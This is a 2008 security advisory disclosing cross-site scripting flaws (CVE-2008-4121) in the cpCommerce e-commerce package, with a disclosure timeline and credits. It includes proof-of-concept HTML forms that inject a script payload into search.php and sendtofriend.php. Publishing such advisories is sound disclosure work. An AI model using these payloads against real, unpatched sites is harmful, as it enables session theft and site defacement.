Cross Site Scripting (XSS) Vulnerabilitiy in cpcommerce, CVE-2008-4121

References

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4121
http://cpcommerce.cpradio.org/

Description

cpCommerce is an open-source e-commerce solution that is maintained by templates and modules.

Example

Assuming cpcommerce is installed on http://localhost/cpcommerce/, anybody could inject JavaScript:

<form method="post" action="http://localhost/cpcommerce/search.php">
<input type="hidden" name="action" value="search.quick">
<input type="text" name="search" value='"><script>alert(1)</script>'>
<input type=submit></form>
<form method="post" action="http://localhost/cpcommerce/sendtofriend.php">
<input type="hidden" name="action" value="sendtofriend">
<input type="text" name="name" value='"><script>alert(1)</script>'>
<input type=submit></form>

Disclosure Timeline

2008-09-23 Vendor contacted
2008-09-23 Vendor released 1.2.4
2008-10-19 Published advisory

CVE Information

The Common Vulnerabilities and Exposures (CVE) project has assigned the name CVE-2008-4121 to this issue. This is a candidate for inclusion in the CVE list (http://cve.mitre.org/), which standardizes names for security problems.

Credits and copyright

This vulnerability was discovered by Fabian Fingerle (published with help from Hanno Boeck).
It's licensed under the creative commons attribution license.

Fabian Fingerle, 2008-09-04, http://www.fabian-fingerle.de